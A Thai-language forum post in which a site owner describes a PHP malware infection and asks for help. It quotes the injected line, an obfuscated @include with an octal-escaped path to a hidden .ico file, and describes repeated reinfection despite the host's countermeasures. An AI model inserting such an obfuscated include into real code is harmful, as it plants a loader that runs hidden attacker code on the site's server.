เว็บโดนไวรัส แก้ไขไฟล์ เพิ่มใน php เช่น index.phpcode เป็นแบบนี้ครับ
@include "\057h\157m\145/\147o\154d\145a\147/\160u\142l\151c\137h\164m\154/\144r\165p\141l\137n\145w\163/\155o\144u\154e\163/\143o\156t\145x\164u\141l\057.\0625\070d\1458\1434\056i\143o";
ซึ่งแกะได้จากเว็บนี้
https://malwaredecoder.com/res...e89422e04a15bfc78ff71b411208db หลังลบโค๊ดเเล้ว ซึ่งคิดว่าน่าจะหมด หรือ อาจจะค้างอยู่ก็ได้ ,
ผมให้โฮสต์ดำเนินการ1. block ip ต่างประเทศทั้งหมด
2. เปลี่ยนสิทธิ์ให้ Apache ซึ่งทำให้แม้แต่เจ้าของ Accout เองก็ อัพไฟล์ หรือ แก้ ไม่ได้ ผ่านทาง FTP
ทำได้ทางเดียวคือ เข้า Direct Admin เเล้ว reset owner แต่ก็จะเปลี่ยนสิทธิ์กลับมาเป็น Apache เองไม่ได้ ต้องให้โฮต์ทำ
ล่าสุด เวลา 5.55 มันจะมาแก้ไฟล์และสร้างไฟล์ไวรัสขึ้นมาอีกได้ โดย สิทธิ์ยังเป็น Apacheมันมี script code แบบนี้ด้วยเหรอ สุดยอดจริงๆหรือ ว่ามันได้ pass/user ของคนดนดูแลโฮสต์ไปเเล้วครับ
ปล1.ถามเพื่อเป็นความรู้ มิได้โจมตีหรืออะไร โฮสก็ดูแลแก้ปัญหามาให้ตลอด)
ปล2.เผื่อจะได้พบผู้ให้บริการโฮสต์ ที่ความเชี่ยวชาญด้านนี้ อาจได้เป็นที่พักพิงในอนาคตสำหรับเว็บที่ต้องการ securityมากๆ